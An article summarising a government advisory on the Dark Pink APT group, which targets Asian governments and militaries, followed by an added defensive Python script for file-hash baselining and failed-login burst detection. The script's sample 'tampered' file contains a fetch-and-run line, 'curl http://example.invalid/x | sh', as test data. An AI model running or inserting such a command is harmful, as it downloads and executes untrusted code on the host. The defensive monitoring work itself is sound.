According to a Cabinet Division advisory, Dark Pink, a new Advanced Persistent Threat (APT) group operational since mid-2021, is targeting Asian governments and military setups. The APT group uses sophisticated tactics, techniques, and procedures that warrant proactive cybersecurity monitoring in government and military setups.
According to the advisory, a recent analysis of attacks on the Malaysian Armed Forces (MAF) reveals Dark Pink's use of phishing emails and sophisticated attacks on email networks. The group is also active in Pakistan, attacking government institutions and military setups.
Dark Pink uses techniques such as USB infection and DLL exploitation to compromise systems. The primary means of compromise (unauthorized intrusion and access) is phishing email.
The Cabinet Division has asked government officials not to open unknown or suspicious emails, links, and attachments; to use the email service provider's anti-virus scanner before downloading any attachment; and to update all applications and operating systems (mobile and PC) in a timely manner.
It has recommended using well-reputed and up-to-date anti-virus/anti-malware software, regularly reviewing application permissions, running system processes, and storage utilization, and using a separate, complex password for each system, mobile device, social media account, financial account, and mail account.
The advisory has asked government officials never to use personal accounts on official systems and to use multi-factor authentication (MFA) or two-factor authentication wherever possible. It has also asked them not to share personal details and credentials with unauthorized or suspicious users, websites, and applications, and to type URLs into the browser rather than clicking on links. Moreover, the advisory has asked officials to open only websites served over HTTPS and to avoid visiting HTTP websites.
The Cabinet Division has asked administrators in government offices and divisions to restrict incoming traffic and user permissions to the maximum extent by implementing system hardening at the OS, BIOS, and application levels. It has also asked them to block unauthorized USB and other storage media through hardening, to format any USB drive every time before using it so that no malware propagates from one system to another, and to monitor their networks, including file hashes, file locations, logins, and unsuccessful login attempts.
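The advisory names two monitoring controls without describing how to implement them: tracking file hashes and locations, and watching for unsuccessful login attempts. The script below is an added example, not part of the advisory or the article, showing one minimal way to do both. It builds a SHA-256 baseline over a set of files and reports anything modified, added, or removed, and it scans authentication log lines for bursts of failed logins from a single source. The file contents, the log line format (`<timestamp> auth: FAILED|SUCCESS login user=<u> src=<ip>`), and the sample log entries are all constructed for this example; a real deployment would read the files from disk and parse the log format the organization's systems actually emit.

```python
"""Added example: file-hash baseline check and failed-login burst detection.

Both the file set and the log format are constructed for illustration.
"""
import hashlib
import re
from collections import defaultdict
from datetime import datetime

# --- File-integrity baseline ---------------------------------------------

def sha256_hex(data):
    """Return the SHA-256 digest of a byte string as hex."""
    return hashlib.sha256(data).hexdigest()


def build_baseline(files):
    """Map each path to the SHA-256 of its contents.

    `files` is {path: bytes}; on a real host you would read each path from
    disk instead of passing contents in directly.
    """
    return {path: sha256_hex(content) for path, content in files.items()}


def check_baseline(baseline, current_files):
    """Compare a stored baseline against the current file set.

    Returns sorted lists of paths that changed, appeared, or disappeared.
    A new or changed file in a monitored location is exactly the signal the
    advisory's "file hashes and file locations" monitoring is meant to catch.
    """
    current = build_baseline(current_files)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


# Constructed sample: the "known good" state and a later snapshot.
BASELINE_FILES = {
    "/srv/app/run.sh": b"#!/bin/sh\necho ok\n",
    "/srv/app/config.ini": b"[main]\nmode=prod\n",
}
CURRENT_FILES = {
    "/srv/app/run.sh": b"#!/bin/sh\necho ok\ncurl http://example.invalid/x | sh\n",  # tampered
    "/srv/app/config.ini": b"[main]\nmode=prod\n",                                   # unchanged
    "/srv/app/helper.dll": b"MZ...constructed placeholder...",                        # new file
}

# --- Failed-login burst detection -----------------------------------------

# Constructed log format for this example; adapt the regex to your real logs.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) auth: (?P<result>FAILED|SUCCESS) login user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample log: one noisy source, one occasional mistyped password.
SAMPLE_LOG = [
    "2024-01-15T09:00:01 auth: FAILED login user=admin src=10.0.0.7",
    "2024-01-15T09:00:05 auth: FAILED login user=admin src=10.0.0.7",
    "2024-01-15T09:00:10 auth: FAILED login user=root src=10.0.0.7",
    "2024-01-15T09:00:15 auth: FAILED login user=admin src=10.0.0.7",
    "2024-01-15T09:00:20 auth: FAILED login user=backup src=10.0.0.7",
    "2024-01-15T09:00:28 auth: FAILED login user=admin src=10.0.0.7",
    "2024-01-15T09:10:00 auth: FAILED login user=alice src=10.0.0.9",
    "2024-01-15T09:10:12 auth: SUCCESS login user=alice src=10.0.0.9",
    "2024-01-15T09:20:00 auth: FAILED login user=alice src=10.0.0.9",
]


def failed_login_bursts(lines, threshold=5, window_seconds=60):
    """Return {src: max_failures_in_window} for sources exceeding the threshold.

    Failures are grouped per source address and scanned with a sliding time
    window, so a slow trickle of mistakes does not alert but a burst does.
    """
    by_src = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m or m["result"] != "FAILED":
            continue
        by_src[m["src"]].append(datetime.fromisoformat(m["ts"]))

    alerts = {}
    for src, times in by_src.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_FILES)
    print("file changes:", check_baseline(baseline, CURRENT_FILES))
    print("login bursts:", failed_login_bursts(SAMPLE_LOG))
```

Running the script reports `run.sh` as modified and `helper.dll` as added, and flags `10.0.0.7` with six failures inside a single 60-second window while leaving `10.0.0.9` alone. The baseline dictionary is what should be stored somewhere the monitored host cannot rewrite it; otherwise an intruder who gains write access can refresh the baseline along with the files.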
The advisory has asked administrators to use reputed anti-virus, firewall, IPS/IDS, and SIEM solutions and to use separate servers and routing for offline LANs and internet-connected networks. It has also asked them to grant internet access only to specific users on a need basis and to restrict data usage and application rights.
It has recommended verifying software and documents through digital code signing before downloading them. The advisory has asked that MFA be implemented for mailing systems, administrator controls, and other critical systems. It has also proposed maintaining periodic backups of critical data, regularly changing administrator-level passwords, and patching and updating all operating systems, applications, and other technical equipment.